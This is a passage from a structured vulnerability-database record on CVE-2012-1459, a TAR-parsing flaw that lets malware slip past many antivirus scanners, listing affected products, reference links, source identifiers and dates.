            url: "http://www.symantec.com/ja/jp/endpoint-protection",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://jp.trendmicro.com/jp/home/index.html",
         },
         {
            title: "Trend Micro HouseCall",
            trust: 0.8,
            url: "http://jp.trendmicro.com/jp/tools/housecall/index.html",
         },
         {
            title: "VBA32",
            trust: 0.8,
            url: "http://anti-virus.by/en/index.shtml",
         },
         {
            title: "VirusBuster",
            trust: 0.8,
            url: "http://www.virusbuster.hu/en",
         },
         {
            title: "V3 Internet Security",
            trust: 0.8,
            url: "http://www.ahnlab.co.jp/product_service/product/b2b/v3is8.asp",
         },
         {
            title: "Kaspersky Anti-Virus",
            trust: 0.8,
            url: "http://www.kaspersky.com/kaspersky_anti-virus",
         },
         {
            title: "Microsoft Security Essentials",
            trust: 0.8,
            url: "http://windows.microsoft.com/ja-jp/windows/products/security-essentials",
         },
         {
            title: "F-Secure Anti-Virus",
            trust: 0.8,
            url: "http://www.f-secure.com/ja/web/home_jp/protection/anti-virus/overview",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-264",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54740",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            db: "NVD",
            id: "CVE-2012-1459",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "http://www.securityfocus.com/archive/1/522005",
         },
         {
            trust: 1.7,
            url: "http://www.ieee-security.org/tc/sp2012/program.html",
         },
         {
            trust: 1.1,
            url: "http://www.securityfocus.com/bid/52623",
         },
         {
            trust: 1.1,
            url: "http://www.mandriva.com/security/advisories?name=mdvsa-2012:094",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80389",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80390",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80391",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80392",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80393",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80395",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80396",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80403",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80406",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80407",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80409",
         },
         {
            trust: 1.1,
            url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
         },
         {
            trust: 1.1,
            url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74302",
         },
         {
            trust: 0.9,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1459",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1459",
         },
         {
            trust: 0.6,
            url: "http://www.nsfocus.net/vulndb/19231",
         },
         {
            trust: 0.4,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1459",
         },
         {
            trust: 0.4,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1458",
         },
         {
            trust: 0.3,
            url: "http://www.antiy.net",
         },
         {
            trust: 0.3,
            url: "http://www.authentium.com",
         },
         {
            trust: 0.3,
            url: "http://www.avast.com",
         },
         {
            trust: 0.3,
            url: "http://www.avg.com",
         },
         {
            trust: 0.3,
            url: "http://www.avira.com/",
         },
         {
            trust: 0.3,
            url: "http://www.bitdefender.com",
         },
         {
            trust: 0.3,
            url: "http://www.emsisoft.com/en/software/antimalware/",
         },
         {
            trust: 0.3,
            url: "http://eset.com",
         },
         {
            trust: 0.3,
            url: "http://www.f-prot.com/",
         },
         {
            trust: 0.3,
            url: "http://www.gdatasoftware.com",
         },
         {
            trust: 0.3,
            url: "http://www.ikarus.at",
         },
         {
            trust: 0.3,
            url: "http://global.jiangmin.com/",
         },
         {
            trust: 0.3,
            url: "http://www.k7computing.com/en/product/k7-antivirusplus.php",
         },
         {
            trust: 0.3,
            url: "http://www.kaspersky.com/",
         },
         {
            trust: 0.3,
            url: "http://www.mcafee.com/",
         },
         {
            trust: 0.3,
            url: "http://www.microsoft.com",
         },
         {
            trust: 0.3,
            url: "http://anti-virus-software-review.toptenreviews.com/norman-review.html",
         },
         {
            trust: 0.3,
            url: "http://www.pctools.com/spyware-doctor-antivirus/",
         },
         {
            trust: 0.3,
            url: "http://www.quickheal.com/",
         },
         {
            trust: 0.3,
            url: "http://www.rising-global.com/",
         },
         {
            trust: 0.3,
            url: "http://www.symantec.com",
         },
         {
            trust: 0.3,
            url: "http://www.trend.com",
         },
         {
            trust: 0.3,
            url: "http://anti-virus.by/en/index.shtml",
         },
         {
            trust: 0.3,
            url: "/archive/1/522005",
         },
         {
            trust: 0.3,
            url: "http://www.ubuntu.com/usn/usn-1482-1",
         },
         {
            trust: 0.2,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1457",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.3",
         },
         {
            trust: 0.1,
            url: "http://www.ubuntu.com/usn/usn-1482-3",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.3",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.3",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/bugs/1015405",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.2",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/bugs/1015337",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.2",
         },
         {
            trust: 0.1,
            url: "http://www.ubuntu.com/usn/usn-1482-2",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.2",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.96.5+dfsg-1ubuntu1.10.04.4",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.1",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.1",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.1",
         },
         {
            trust: 0.1,
            url: "http://www.mandriva.com/security/",
         },
         {
            trust: 0.1,
            url: "http://www.mandriva.com/security/advisories",
         },
         {
            trust: 0.1,
            url: "http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=changelog;hb=clamav-0.97.5",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1457",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1458",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54740",
         },
         {
            db: "BID",
            id: "52623",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            db: "PACKETSTORM",
            id: "115619",
         },
         {
            db: "PACKETSTORM",
            id: "113895",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            db: "NVD",
            id: "CVE-2012-1459",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "VULHUB",
            id: "VHN-54740",
         },
         {
            db: "BID",
            id: "52623",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            db: "PACKETSTORM",
            id: "115619",
         },
         {
            db: "PACKETSTORM",
            id: "113895",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            db: "NVD",
            id: "CVE-2012-1459",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2012-03-21T00:00:00",
            db: "VULHUB",
            id: "VHN-54740",
         },
         {
            date: "2012-03-20T00:00:00",
            db: "BID",
            id: "52623",
         },
         {
            date: "2012-03-23T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            date: "2012-08-17T02:36:21",
            db: "PACKETSTORM",
            id: "115619",
         },
         {
            date: "2012-06-20T03:33:06",
            db: "PACKETSTORM",
            id: "113895",
         },
         {
            date: "2012-06-20T02:54:11",
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            date: "2012-06-19T00:56:02",
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            date: "2012-03-21T10:11:49.597000",
            db: "NVD",
            id: "CVE-2012-1459",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2018-01-18T00:00:00",
            db: "VULHUB",
            id: "VHN-54740",
         },
         {
            date: "2015-04-13T22:00:00",
            db: "BID",
            id: "52623",
         },
         {
            date: "2012-07-25T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            date: "2018-01-18T02:29:13.273000",
            db: "NVD",
            id: "CVE-2012-1459",
         },
         {
            date: "2012-04-01T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "PACKETSTORM",
            id: "115619",
         },
         {
            db: "PACKETSTORM",
            id: "113895",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
      trust: 1,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple products  TAR Vulnerability that prevents file parsers from detecting malware",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "permissions and access control",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
      trust: 0.6,
   },
}